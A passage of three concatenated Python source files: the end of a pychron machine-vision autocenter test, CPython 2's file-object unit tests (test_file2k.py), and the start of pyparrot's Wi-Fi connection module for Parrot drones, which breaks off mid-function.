# self.manager.calculate_new_center(0, 0, 0, 0, dim=1.25)
t = Thread(target=func)
t.start()
self.t = t
def _set_test_image(self):
from pychron.globals import globalv
# p = '/Users/ross/Sandbox/test_target.jpg'
# p = '/Users/ross/Sandbox/pos_err/pos_err_200_0-002.jpg'
p = '/Users/ross/Sandbox/poserror/pos_err_221_0-007.jpg'
p = '/Users/ross/Sandbox/poserror/snapshot009.jpg'
p = '/Users/ross/Sandbox/graintest/image0269.png'
# p = '/Users/argonlab3/Pychron_co2/data/snapshots/pos_err_220_0--001.jpg'
globalv.video_test_path = p
globalv.video_test = True
def _test1_button_fired(self):
self._set_test_image()
self._test1()
if __name__ == '__main__':
logging_setup('mv', use_archiver=False, use_file=False)
t = TestAutocenter()
t.init()
t.configure_traits(view=View(UItem('test1_button'),
UItem('object.display_image.source_frame',
width=254, height=254,
editor=ImageEditor(refresh='object.display_image.refresh_needed')),
width=500, height=300))
# ============= EOF =============================================
# class TestMVManager(MachineVisionManager):
# step = Button
# test_image = Instance(MVImage, ())
#
# def _step_fired(self):
# self.step_signal.set()
#
# def traits_view(self):
# return View(Item('test'),
# Item('step'),
# Item('test_image', show_label=False,
# style='custom'),
# resizable=True
# )
#
# def _test_fired(self):
# from pychron.globals import globalv
#
# p = '/Users/ross/Sandbox/test_target.jpg'
# # p = '/Users/ross/Sandbox/pos_err/pos_err_200_0-002.jpg'
# p = '/Users/ross/Sandbox/poserror/pos_err_221_0-007.jpg'
# # p = '/Users/ross/Sandbox/poserror/snapshot009.jpg'
# # force video to reload test image
# self.video.source_frame = None
# globalv.video_test_path = p
#
# im = self.setup_image()
#
# # self._test2(im)
# from pychron.core.ui.thread import Thread
# t = Thread(target=self._test2, args=(im,))
# t.start()
# self._t = t
#
# # ===============================================================================
# # tests
# # ===============================================================================
# def _test(self, im):
#
# paths = (
# # ('/Users/ross/Sandbox/pos_err/snapshot007.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_221_0-005.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_207_0-002.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_209_0-001.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_210_0-001.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_220_0-001.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_221_0-001.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_221_0-002.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_221_0-003.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_221_0-004.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_200_0-001.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_200_0-002.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_201_0-001.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_202_0-001.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_203_0-001.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_204_0-001.jpg', 1.25),
# ('/Users/ross/Sandbox/pos_err/pos_err_206_0-001.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_206_1-001.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_207_0-001.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_52001.jpg', 2.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_52001.tiff', 2.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_52002.jpg', 2.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_53001.jpg', 2.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_53002.jpg', 2.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_53003.jpg', 2.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_54001.jpg', 2.25),
# )
# fails = 0
# times = []
#
# # im = self.target_image
# for p, dim in paths[:]:
# from pychron.globals import globalv
# # force video to reload test image
# self.video.source_frame = None
# globalv.video_test_path = p
# # return
# # im.source_frame = self.new_image_frame()
# frm = self.new_image_frame()
# # self.target_image.load()
#
# cw = ch = dim * 3.2
# # cw = ch = dim
# frame = self._crop_image(frm, cw, ch)
# im.source_frame = frame
# # time.sleep(1)
# # continue
# # self.target_image.set_frame(0, frame)
#
# # loc.pxpermm = self.cpxpermm
#
# # loc.croppixels = (cw * self.pxpermm, ch * self.pxpermm)
#
# loc = self.new_co2_locator()
#
# st = time.time()
# dx, dy = loc.find(im, frame, dim * self.pxpermm)
#
# times.append(time.time() - st)
# if dx and dy:
# self.info('SUCCESS path={}'.format(p))
# self.info('calculated deviation {:0.3f},{:0.3f}'.format(dx, dy))
# else:
# fails += 1
# self.info('FAIL path={}'.format(p))
# time.sleep(1)
#
# if times:
# n = len(paths)
# self.info('failed to find center {}/{} times'.format(fails, n))
# self.info('execution times: min={} max={} avg={}'.format(min(times), max(times), sum(times) / n))
#
# # def foo():
# # from pylab import show, plot
# # plot(times)
# # show()
# # do_later(foo)
#
# def _test2(self, im):
#
# dim = 1.0
#
# frame = self.new_image_frame()
#
# cw = ch = dim * 3.2
#
# frame = self._crop_image(frame, cw, ch)
# # print frame
# # im.source_frame = frame
# loc = self.new_co2_locator()
# from threading import Event
# evt = Event()
# self.step_signal = evt
# loc.step_signal = evt
# loc.test_image = self.test_image
#
# dx, dy = loc.find(im, frame, dim * self.pxpermm)
# # print dx, dy
# def setup_image(self):
# frame = self.new_image_frame()
# im = self.new_image(frame)
# self.view_image(im)
# return im
#
# def test1():
# from pychron.image.video import Video
# from pychron.globals import globalv
# globalv.video_test = True
# globalv.video_test_path = '/Users/ross/Sandbox/pos_err/snapshot007.jpg'
# # globalv.video_test_path = '/Users/ross/Sandbox/pos_err/pos_err_53002.jpg'
# globalv.video_test_path = '/Users/ross/Sandbox/pos_err/pos_err_221_0-005.jpg'
#
# # globalv.video_test_path = '/Users/ross/Sandbox/pos_err/diodefailsnapshot.jpg'
# video = Video()
# video.open()
# mv = MachineVisionManager(video=video)
# mv.configure_traits()
#
#
# if __name__ == '__main__':
# from pychron.core.helpers.logger_setup import logging_setup
# logging_setup('mv')
# test()
|
test_file2k.py
|
import sys
import os
import unittest
import itertools
import time
from array import array
from weakref import proxy
try:
import threading
except ImportError:
threading = None
from test import test_support
from test.test_support import TESTFN, run_unittest
from UserList import UserList
class AutoFileTests(unittest.TestCase):
# file tests for which a test file is automatically set up
def setUp(self):
self.f = open(TESTFN, 'wb')
def tearDown(self):
if self.f:
self.f.close()
os.remove(TESTFN)
def testWeakRefs(self):
# verify weak references
p = proxy(self.f)
p.write('teststring')
self.assertEquals(self.f.tell(), p.tell())
self.f.close()
self.f = None
self.assertRaises(ReferenceError, getattr, p, 'tell')
def testAttributes(self):
# verify expected attributes exist
f = self.f
with test_support.check_py3k_warnings():
softspace = f.softspace
f.name # merely shouldn't blow up
f.mode # ditto
f.closed # ditto
with test_support.check_py3k_warnings():
# verify softspace is writable
f.softspace = softspace # merely shouldn't blow up
# verify the others aren't
for attr in 'name', 'mode', 'closed':
self.assertRaises((AttributeError, TypeError), setattr, f, attr, 'oops')
def testReadinto(self):
# verify readinto
self.f.write('12')
self.f.close()
a = array('c', 'x'*10)
self.f = open(TESTFN, 'rb')
n = self.f.readinto(a)
self.assertEquals('12', a.tostring()[:n])
def testWritelinesUserList(self):
# verify writelines with instance sequence
l = UserList(['1', '2'])
self.f.writelines(l)
self.f.close()
self.f = open(TESTFN, 'rb')
buf = self.f.read()
self.assertEquals(buf, '12')
def testWritelinesIntegers(self):
# verify writelines with integers
self.assertRaises(TypeError, self.f.writelines, [1, 2, 3])
def testWritelinesIntegersUserList(self):
# verify writelines with integers in UserList
l = UserList([1,2,3])
self.assertRaises(TypeError, self.f.writelines, l)
def testWritelinesNonString(self):
# verify writelines with non-string object
class NonString:
pass
self.assertRaises(TypeError, self.f.writelines,
[NonString(), NonString()])
def testRepr(self):
# verify repr works
self.assertTrue(repr(self.f).startswith("<open file '" + TESTFN))
def testErrors(self):
self.f.close()
self.f = open(TESTFN, 'rb')
f = self.f
self.assertEquals(f.name, TESTFN)
self.assertTrue(not f.isatty())
self.assertTrue(not f.closed)
self.assertRaises(TypeError, f.readinto, "")
f.close()
self.assertTrue(f.closed)
def testMethods(self):
methods = ['fileno', 'flush', 'isatty', 'next', 'read', 'readinto',
'readline', 'readlines', 'seek', 'tell', 'truncate',
'write', '__iter__']
deprecated_methods = ['xreadlines']
if sys.platform.startswith('atheos'):
methods.remove('truncate')
# __exit__ should close the file
self.f.__exit__(None, None, None)
self.assertTrue(self.f.closed)
for methodname in methods:
method = getattr(self.f, methodname)
# should raise on closed file
self.assertRaises(ValueError, method)
with test_support.check_py3k_warnings():
for methodname in deprecated_methods:
method = getattr(self.f, methodname)
self.assertRaises(ValueError, method)
self.assertRaises(ValueError, self.f.writelines, [])
# file is closed, __exit__ shouldn't do anything
self.assertEquals(self.f.__exit__(None, None, None), None)
# it must also return None if an exception was given
try:
1 // 0
except:
self.assertEquals(self.f.__exit__(*sys.exc_info()), None)
def testReadWhenWriting(self):
self.assertRaises(IOError, self.f.read)
def testIssue5677(self):
# Remark: Do not perform more than one test per open file,
# since that does NOT catch the readline error on Windows.
data = 'xxx'
for mode in ['w', 'wb', 'a', 'ab']:
for attr in ['read', 'readline', 'readlines']:
self.f = open(TESTFN, mode)
self.f.write(data)
self.assertRaises(IOError, getattr(self.f, attr))
self.f.close()
self.f = open(TESTFN, mode)
self.f.write(data)
self.assertRaises(IOError, lambda: [line for line in self.f])
self.f.close()
self.f = open(TESTFN, mode)
self.f.write(data)
self.assertRaises(IOError, self.f.readinto, bytearray(len(data)))
self.f.close()
for mode in ['r', 'rb', 'U', 'Ub', 'Ur', 'rU', 'rbU', 'rUb']:
self.f = open(TESTFN, mode)
self.assertRaises(IOError, self.f.write, data)
self.f.close()
self.f = open(TESTFN, mode)
self.assertRaises(IOError, self.f.writelines, [data, data])
self.f.close()
self.f = open(TESTFN, mode)
self.assertRaises(IOError, self.f.truncate)
self.f.close()
class OtherFileTests(unittest.TestCase):
def testOpenDir(self):
this_dir = os.path.dirname(__file__)
for mode in (None, "w"):
try:
if mode:
f = open(this_dir, mode)
else:
f = open(this_dir)
except IOError as e:
self.assertEqual(e.filename, this_dir)
else:
self.fail("opening a directory didn't raise an IOError")
def testModeStrings(self):
# check invalid mode strings
for mode in ("", "aU", "wU+"):
try:
f = open(TESTFN, mode)
except ValueError:
pass
else:
f.close()
self.fail('%r is an invalid file mode' % mode)
# Some invalid modes fail on Windows, but pass on Unix
# Issue3965: avoid a crash on Windows when filename is unicode
for name in (TESTFN, unicode(TESTFN), unicode(TESTFN + '\t')):
try:
f = open(name, "rr")
except (IOError, ValueError):
pass
else:
f.close()
def testStdin(self):
# This causes the interpreter to exit on OSF1 v5.1.
if sys.platform != 'osf1V5':
self.assertRaises(IOError, sys.stdin.seek, -1)
else:
print >>sys.__stdout__, (
' Skipping sys.stdin.seek(-1), it may crash the interpreter.'
' Test manually.')
self.assertRaises(IOError, sys.stdin.truncate)
def testUnicodeOpen(self):
# verify repr works for unicode too
f = open(unicode(TESTFN), "w")
self.assertTrue(repr(f).startswith("<open file u'" + TESTFN))
f.close()
os.unlink(TESTFN)
def testBadModeArgument(self):
# verify that we get a sensible error message for bad mode argument
bad_mode = "qwerty"
try:
f = open(TESTFN, bad_mode)
except ValueError, msg:
if msg.args[0] != 0:
s = str(msg)
if TESTFN in s or bad_mode not in s:
self.fail("bad error message for invalid mode: %s" % s)
# if msg.args[0] == 0, we're probably on Windows where there may
# be no obvious way to discover why open() failed.
else:
f.close()
self.fail("no error for invalid mode: %s" % bad_mode)
def testSetBufferSize(self):
# make sure that explicitly setting the buffer size doesn't cause
# misbehaviour especially with repeated close() calls
for s in (-1, 0, 1, 512):
try:
f = open(TESTFN, 'w', s)
f.write(str(s))
f.close()
f.close()
f = open(TESTFN, 'r', s)
d = int(f.read())
f.close()
f.close()
except IOError, msg:
self.fail('error setting buffer size %d: %s' % (s, str(msg)))
self.assertEquals(d, s)
def testTruncateOnWindows(self):
os.unlink(TESTFN)
def bug801631():
# SF bug <http://www.python.org/sf/801631>
# "file.truncate fault on windows"
f = open(TESTFN, 'wb')
f.write('12345678901') # 11 bytes
f.close()
f = open(TESTFN,'rb+')
data = f.read(5)
if data != '12345':
self.fail("Read on file opened for update failed %r" % data)
if f.tell() != 5:
self.fail("File pos after read wrong %d" % f.tell())
f.truncate()
if f.tell() != 5:
self.fail("File pos after ftruncate wrong %d" % f.tell())
f.close()
size = os.path.getsize(TESTFN)
if size != 5:
self.fail("File size after ftruncate wrong %d" % size)
try:
bug801631()
finally:
os.unlink(TESTFN)
def testIteration(self):
# Test the complex interaction when mixing file-iteration and the
# various read* methods. Ostensibly, the mixture could just be tested
# to work when it should work according to the Python language,
# instead of fail when it should fail according to the current CPython
# implementation. People don't always program Python the way they
# should, though, and the implemenation might change in subtle ways,
# so we explicitly test for errors, too; the test will just have to
# be updated when the implementation changes.
dataoffset = 16384
filler = "ham\n"
assert not dataoffset % len(filler), \
"dataoffset must be multiple of len(filler)"
nchunks = dataoffset // len(filler)
testlines = [
"spam, spam and eggs\n",
"eggs, spam, ham and spam\n",
"saussages, spam, spam and eggs\n",
"spam, ham, spam and eggs\n",
"spam, spam, spam, spam, spam, ham, spam\n",
"wonderful spaaaaaam.\n"
]
methods = [("readline", ()), ("read", ()), ("readlines", ()),
("readinto", (array("c", " "*100),))]
try:
# Prepare the testfile
bag = open(TESTFN, "w")
bag.write(filler * nchunks)
bag.writelines(testlines)
bag.close()
# Test for appropriate errors mixing read* and iteration
for methodname, args in methods:
f = open(TESTFN)
if f.next() != filler:
self.fail, "Broken testfile"
meth = getattr(f, methodname)
try:
meth(*args)
except ValueError:
pass
else:
self.fail("%s%r after next() didn't raise ValueError" %
(methodname, args))
f.close()
# Test to see if harmless (by accident) mixing of read* and
# iteration still works. This depends on the size of the internal
# iteration buffer (currently 8192,) but we can test it in a
# flexible manner. Each line in the bag o' ham is 4 bytes
# ("h", "a", "m", "\n"), so 4096 lines of that should get us
# exactly on the buffer boundary for any power-of-2 buffersize
# between 4 and 16384 (inclusive).
f = open(TESTFN)
for i in range(nchunks):
f.next()
testline = testlines.pop(0)
try:
line = f.readline()
except ValueError:
self.fail("readline() after next() with supposedly empty "
"iteration-buffer failed anyway")
if line != testline:
self.fail("readline() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
testline = testlines.pop(0)
buf = array("c", "\x00" * len(testline))
try:
f.readinto(buf)
except ValueError:
self.fail("readinto() after next() with supposedly empty "
"iteration-buffer failed anyway")
line = buf.tostring()
if line != testline:
self.fail("readinto() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
testline = testlines.pop(0)
try:
line = f.read(len(testline))
except ValueError:
self.fail("read() after next() with supposedly empty "
"iteration-buffer failed anyway")
if line != testline:
self.fail("read() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
try:
lines = f.readlines()
except ValueError:
self.fail("readlines() after next() with supposedly empty "
"iteration-buffer failed anyway")
if lines != testlines:
self.fail("readlines() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
# Reading after iteration hit EOF shouldn't hurt either
f = open(TESTFN)
try:
for line in f:
pass
try:
f.readline()
f.readinto(buf)
f.read()
f.readlines()
except ValueError:
self.fail("read* failed after next() consumed file")
finally:
f.close()
finally:
os.unlink(TESTFN)
class FileSubclassTests(unittest.TestCase):
def testExit(self):
# test that exiting with context calls subclass' close
class C(file):
def __init__(self, *args):
self.subclass_closed = False
file.__init__(self, *args)
def close(self):
self.subclass_closed = True
file.close(self)
with C(TESTFN, 'w') as f:
pass
self.assertTrue(f.subclass_closed)
@unittest.skipUnless(threading, 'Threading required for this test.')
class FileThreadingTests(unittest.TestCase):
# These tests check the ability to call various methods of file objects
# (including close()) concurrently without crashing the Python interpreter.
# See #815646, #595601
def setUp(self):
self._threads = test_support.threading_setup()
self.f = None
self.filename = TESTFN
with open(self.filename, "w") as f:
f.write("\n".join("0123456789"))
self._count_lock = threading.Lock()
self.close_count = 0
self.close_success_count = 0
self.use_buffering = False
def tearDown(self):
if self.f:
try:
self.f.close()
except (EnvironmentError, ValueError):
pass
try:
os.remove(self.filename)
except EnvironmentError:
pass
test_support.threading_cleanup(*self._threads)
def _create_file(self):
if self.use_buffering:
self.f = open(self.filename, "w+", buffering=1024*16)
else:
self.f = open(self.filename, "w+")
def _close_file(self):
with self._count_lock:
self.close_count += 1
self.f.close()
with self._count_lock:
self.close_success_count += 1
def _close_and_reopen_file(self):
self._close_file()
# if close raises an exception thats fine, self.f remains valid so
# we don't need to reopen.
self._create_file()
def _run_workers(self, func, nb_workers, duration=0.2):
with self._count_lock:
self.close_count = 0
self.close_success_count = 0
self.do_continue = True
threads = []
try:
for i in range(nb_workers):
t = threading.Thread(target=func)
t.start()
threads.append(t)
for _ in xrange(100):
time.sleep(duration/100)
with self._count_lock:
if self.close_count-self.close_success_count > nb_workers+1:
if test_support.verbose:
print 'Q',
break
time.sleep(duration)
finally:
self.do_continue = False
for t in threads:
t.join()
def _test_close_open_io(self, io_func, nb_workers=5):
def worker():
self._create_file()
funcs = itertools.cycle((
lambda: io_func(),
lambda: self._close_and_reopen_file(),
))
for f in funcs:
if not self.do_continue:
break
try:
f()
except (IOError, ValueError):
pass
self._run_workers(worker, nb_workers)
if test_support.verbose:
# Useful verbose statistics when tuning this test to take
# less time to run but still ensuring that its still useful.
#
# the percent of close calls that raised an error
percent = 100. - 100.*self.close_success_count/self.close_count
print self.close_count, ('%.4f ' % percent),
def test_close_open(self):
def io_func():
pass
self._test_close_open_io(io_func)
def test_close_open_flush(self):
def io_func():
self.f.flush()
self._test_close_open_io(io_func)
def test_close_open_iter(self):
def io_func():
list(iter(self.f))
self._test_close_open_io(io_func)
def test_close_open_isatty(self):
def io_func():
self.f.isatty()
self._test_close_open_io(io_func)
def test_close_open_print(self):
def io_func():
print >> self.f, ''
self._test_close_open_io(io_func)
def test_close_open_print_buffered(self):
self.use_buffering = True
def io_func():
print >> self.f, ''
self._test_close_open_io(io_func)
def test_close_open_read(self):
def io_func():
self.f.read(0)
self._test_close_open_io(io_func)
def test_close_open_readinto(self):
def io_func():
a = array('c', 'xxxxx')
self.f.readinto(a)
self._test_close_open_io(io_func)
def test_close_open_readline(self):
def io_func():
self.f.readline()
self._test_close_open_io(io_func)
def test_close_open_readlines(self):
def io_func():
self.f.readlines()
self._test_close_open_io(io_func)
def test_close_open_seek(self):
def io_func():
self.f.seek(0, 0)
self._test_close_open_io(io_func)
def test_close_open_tell(self):
def io_func():
self.f.tell()
self._test_close_open_io(io_func)
def test_close_open_truncate(self):
def io_func():
self.f.truncate()
self._test_close_open_io(io_func)
def test_close_open_write(self):
def io_func():
self.f.write('')
self._test_close_open_io(io_func)
def test_close_open_writelines(self):
def io_func():
self.f.writelines('')
self._test_close_open_io(io_func)
class StdoutTests(unittest.TestCase):
def test_move_stdout_on_write(self):
# Issue 3242: sys.stdout can be replaced (and freed) during a
# print statement; prevent a segfault in this case
save_stdout = sys.stdout
class File:
def write(self, data):
if '\n' in data:
sys.stdout = save_stdout
try:
sys.stdout = File()
print "some text"
finally:
sys.stdout = save_stdout
def test_del_stdout_before_print(self):
# Issue 4597: 'print' with no argument wasn't reporting when
# sys.stdout was deleted.
save_stdout = sys.stdout
del sys.stdout
try:
print
except RuntimeError as e:
self.assertEquals(str(e), "lost sys.stdout")
else:
self.fail("Expected RuntimeError")
finally:
sys.stdout = save_stdout
def test_main():
# Historically, these tests have been sloppy about removing TESTFN.
# So get rid of it no matter what.
try:
run_unittest(AutoFileTests, OtherFileTests, FileSubclassTests,
FileThreadingTests, StdoutTests)
finally:
if os.path.exists(TESTFN):
os.unlink(TESTFN)
if __name__ == '__main__':
test_main()
|
wifiConnection.py
|
"""
Holds all the data and commands needed to fly a Bebop drone.
Author: Amy McGovern, dramymcgovern@gmail.com
"""
from zeroconf import ServiceBrowser, Zeroconf
import time
import socket
import ipaddress
import json
from util.colorPrint import color_print
import struct
import threading
from commandsandsensors.DroneSensorParser import get_data_format_and_size
class mDNSListener(object):
"""
This is adapted from the listener code at
https://pypi.python.org/pypi/zeroconf
"""
def __init__(self, wifi_connection):
self.wifi_connection = wifi_connection
def remove_service(self, zeroconf, type, name):
#print("Service %s removed" % (name,))
pass
def add_service(self, zeroconf, type, name):
info = zeroconf.get_service_info(type, name)
print("Service %s added, service info: %s" % (name, info))
self.wifi_connection._connect_listener_called(info)
class WifiConnection:
def __init__(self, drone, drone_type="Bebop"):
"""
Can be a connection to a Bebop or a Mambo right now
:param type: type of drone to connect to
"""
self.is_connected = False
if (drone_type not in ("Bebop", "Mambo")):
color_print("Error: only type Bebop and Mambo are currently supported", "ERROR")
return
self.drone = drone
self.drone_type = drone_type
self.udp_send_port = 0 # defined during the handshake
self.udp_receive_port = 43210
self.is_listening = True # for the UDP listener
if (drone_type == "Bebop"):
self.mdns_address = "_arsdk-090c._udp.local."
#Bebop video streaming
self.stream_port = 55004
self.stream_control_port = 55005
elif (drone_type == "Mambo"):
self.mdns_address = "_arsdk-090b._udp.local."
# map of the data types by name (for outgoing packets)
self.data_types_by_name = {
'ACK' : 1,
'DATA_NO_ACK': 2,
'LOW_LATENCY_DATA': 3,
'DATA_WITH_ACK' : 4
}
# map of the incoming data types by number (to figure out if we need to ack etc)
self.data_types_by_number = {
1 : 'ACK',
2 : 'DATA_NO_ACK',
3 : 'LOW_LATENCY_DATA',
4 : 'DATA_WITH_ACK'
}
self.sequence_counter = {
'PONG': 0,
'SEND_NO_ACK': 0,
'SEND_WITH_ACK': 0,
'SEND_HIGH_PRIORITY': 0,
'VIDEO_ACK': 0,
'ACK_DRONE_DATA': 0,
'NO_ACK_DRONE_DATA': 0,
'VIDEO_DATA': 0,
}
self.buffer_ids = {
'PING': 0, # pings from device
'PONG': 1, # respond to pings
'SEND_NO_ACK': 10, # not-ack commandsandsensors (piloting and camera rotations)
'SEND_WITH_ACK': 11, # ack commandsandsensors (all piloting commandsandsensors)
'SEND_HIGH_PRIORITY': 12, # emergency commandsandsensors
'VIDEO_ACK': 13, # ack for video
'ACK_DRONE_DATA' : 127, # drone data that needs an ack
'NO_ACK_DRONE_DATA' : 126, # data from drone (including battery and others), no ack
'VIDEO_DATA' : 125, # video data
'ACK_FROM_SEND_WITH_ACK': 139 # 128 + buffer id for 'SEND_WITH_ACK' is 139
}
self.data_buffers = (self.buffer_ids['ACK_DRONE_DATA'], self.buffer_ids['NO_ACK_DRONE_DATA'])
# store whether a command was acked
self.command_received = {
'SEND_WITH_ACK': False,
'SEND_HIGH_PRIORITY': False,
'ACK_COMMAND': False
}
# maximum number of times to try a packet before assuming it failed
self.max_packet_retries = 1
# threading lock for waiting
self._lock = threading.Lock()
def connect(self, num_retries):
"""
Connects to the drone
:param num_retries: maximum number of retries
:return: True if the connection succeeded and False otherwise
"""
zeroconf = Zeroconf()
listener = mDNSListener(self)
browser = ServiceBrowser(zeroconf, self.mdns_address , listener)
# basically have to sleep until the info comes through on the listener
num_tries = 0
while (num_tries < num_retries and not self.is_connected):
time.sleep(1)
num_tries += 1
# if we didn't hear the listener, return False
if (not self.is_connected):
color_print("connection failed: did you remember to connect your machine to the Drone's wifi network?", "ERROR")
return False
else:
browser.cancel()
# perform the handshake and get the UDP info
handshake = self._handshake(num_retries)
if (handshake):
self._create_udp_connection()
self.listener_thread = threading.Thread(target=self._listen_socket)
self.listener_thread.start()
color_print("Success in setting up the wifi network to the drone!", "SUCCESS")
return True
else:
color_print("Error: TCP handshake failed.", "ERROR")
return False
def _listen_socket(self):
"""
Listens to the socket and sleeps in between receives.
Runs forever (until disconnect is called)
"""
print("starting listening at ")
lasttime = time.time()
data = None
while (self.is_listening):
lasttime = time.time()
try:
(data, address) = self.udp_receive_sock.recvfrom(66000)
except socket.timeout:
print("timeout - trying again")
except:
pass
self.handle_data(data)
color_print("disconnecting", "INFO")
self.disconnect()
def handle_data(self, data):
"""
Handles the data as it comes in
:param data: raw data packet
:return:
"""
# got the idea to of how to handle this data nicely (handling the perhaps extra data in the packets)
# and unpacking the critical info first (id, size etc) from
# https://github.com/N-Bz/bybop/blob/8d4c569c8e66bd1f0fdd768851409ca4b86c4ecd/src/Bybop_NetworkAL.py
my_data = data
while (my_data):
#print("inside loop to handle data ")
(data_type, buffer_id, packet_seq_id, packet_size) = struct.unpack('<BBBI', my_data[0:7])
recv_data = my_data[7:packet_size]
#print("\tgot a data type of of %d " % data_type)
#print("\tgot a buffer id of of %d " % buffer_id)
#print("\tgot a packet seq id of of %d " % packet_seq_id)
#print("\tsize is %d" % packet_size)
self.handle_frame(data_type, buffer_id, packet_seq_id, recv_data)
# loop in case there is more data
my_data = my_data[packet_size:]
#print("assigned more data")
#print("ended loop handling data")
def handle_frame(self, packet_type, buffer_id, packet_seq_id, recv_data):
if (buffer_id == self.buffer_ids['PING']):
#color_print("this is a ping! need to pong", "INFO")
self._send_pong(recv_data)
if (self.data_types_by_number[packet_type] == 'ACK'):
#print("setting command received to true")
ack_seq = int(struct.unpack("<B", recv_data)[0])
self._set_command_received('SEND_WITH_ACK', True, ack_seq)
self.ack_packet(buffer_id, ack_seq)
elif (self.data_types_by_number[packet_type] == 'DATA_NO_ACK'):
#print("DATA NO ACK")
if (buffer_id in self.data_buffers):
self.drone.update_sensors(packet_type, buffer_id, packet_seq_id, recv_data, ack=False)
elif (self.data_types_by_number[packet_type] == 'LOW_LATENCY_DATA'):
print("Need to handle Low latency data")
elif (self.data_types_by_number[packet_type] == 'DATA_WITH_ACK'):
#print("DATA WITH ACK")
if (buffer_id in self.data_buffers):
self.drone.update_sensors(packet_type, buffer_id, packet_seq_id, recv_data, ack=True)
else:
color_print("HELP ME", "ERROR")
print("got a different type of data - help")
def _send_pong(self, data):
"""
Send a PONG back to a PING
:param data: data that needs to be PONG/ACK'd
:return: nothing
"""
size = len(data)
self.sequence_counter['PONG'] = (self.sequence_counter['PONG'] + 1) % 256
packet = struct.pack("<BBBI", self.data_types_by_name['DATA_NO_ACK'], self.buffer_ids['PONG'],
self.sequence_counter['PONG'], size + 7)
packet += data
self.safe_send(packet)
def _set_command_received(self, channel, val, seq_id):
"""
Set the command received on the specified channel to the specified value (used for acks)
:param channel: channel
:param val: True or False
:return:
"""
self.command_received[(channel, seq_id)] = val
def _is_command_received(self, channel, seq_id):
"""
Is the command received?
:param channel: channel it was sent on
:param seq_id: sequence id of the command
:return:
"""
return self.command_received[(channel, seq_id)]
def _handshake(self, num_retries):
"""
Performs the handshake over TCP to get all the connection info
:return: True if it worked and False otherwise
"""
# create the TCP socket for the handshake
tcp_sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
#print (self.connection_info.address, self.connection_info.port)
#print(ipaddress.IPv4Address(self.connection_info.address))
self.drone_ip = ipaddress.IPv4Address(self.connection_info.address).exploded
# connect
tcp_sock.connect((self.drone_ip, self.connection_info.port))
# send the handshake information
if(self.drone_type=="Bebop"):
# For Bebop add video stream ports to the json request
json_string = json.dumps({"d2c_port":self.udp_receive_port,
"controller_type":"computer",
"controller_name":"pyparrot",
"arstream2_client_stream_port":self.stream_port,
"arstream2_client_control_port":self.stream_control_port})
else:
json_string = json.dumps({"d2c_port":self.udp_receive_port,
"controller_type":"computer",
"controller_name":"pyparrot"})
json_obj = json.loads(json_string)
print(json_string)
try:
# python 3
tcp_sock.send(bytes(json_string, 'utf-8'))
except:
# python 2
tcp_sock.send(json_string)
# wait for the response
finished = False
num_try = 0
while (not finished and num_try < num_retries):
data = tcp_sock.recv(4096).decode('utf-8')
if (len(data) > 0):
my_data = data[0:-1]
self.udp_data = json.loads(str(my_data))
# if the drone refuses the connection, return false
if (self.udp_data['status'] != 0):
return False
print(self.udp_data)
self.udp_send_port = self.udp_data['c2d_port']
print("c2d_port is %d" % self.udp_send_port)
finished = True
else:
num_try += 1
# cleanup
tcp_sock.close()
return finished
def _create_udp_connection(self):
"""
Create the UDP connection
"""
self.udp_send_sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
#self.udp_send_sock.connect((self.drone_ip, self.udp_send_port))
self.udp_receive_sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
# don't use the connect, use bind instead
# learned from bybop code
# https://github.com/N-Bz/bybop/blob/8d4c569c8e66bd1f0fdd768851409ca4b86c4ecd/src/Bybop_NetworkAL.py
#self.udp_receive_sock.connect((self.drone_ip, self.udp_receive_port))
self.udp_receive_sock.settimeout(5.0)
self.udp_receive_sock.bind(('0.0.0.0', int(self.udp_receive_port)))
def _connect_listener_called(self, connection_info):
"""
Save the connection info and set the connected to be true. This si called within the listener
for the connection.
:param connection_info:
:return:
"""
self.connection_info = connection_info
self.is_connected = True
def disconnect(self):
"""
Disconnect cleanly from the sockets
"""
self.is_listening = False
# Sleep for a moment to allow all socket activity to cease before closing
# This helps to avoids a Winsock error regarding a operations on a closed socket
self.smart_sleep(0.5)
# then put the close in a try/except to catch any further winsock errors
# the errors seem to be mostly occurring on windows for some reason
try:
self.udp_receive_sock.close()
self.udp_send_sock.close()
except:
pass
def safe_send(self, packet):
packet_sent = False
#print "inside safe send"
try_num = 0
while (not packet_sent and try_num < self.max_packet_retries):
try:
self.udp_send_sock.sendto(packet, (self.drone_ip, self.udp_send_port))
packet_sent = True
except:
#print "resetting connection"
self.udp_send_sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
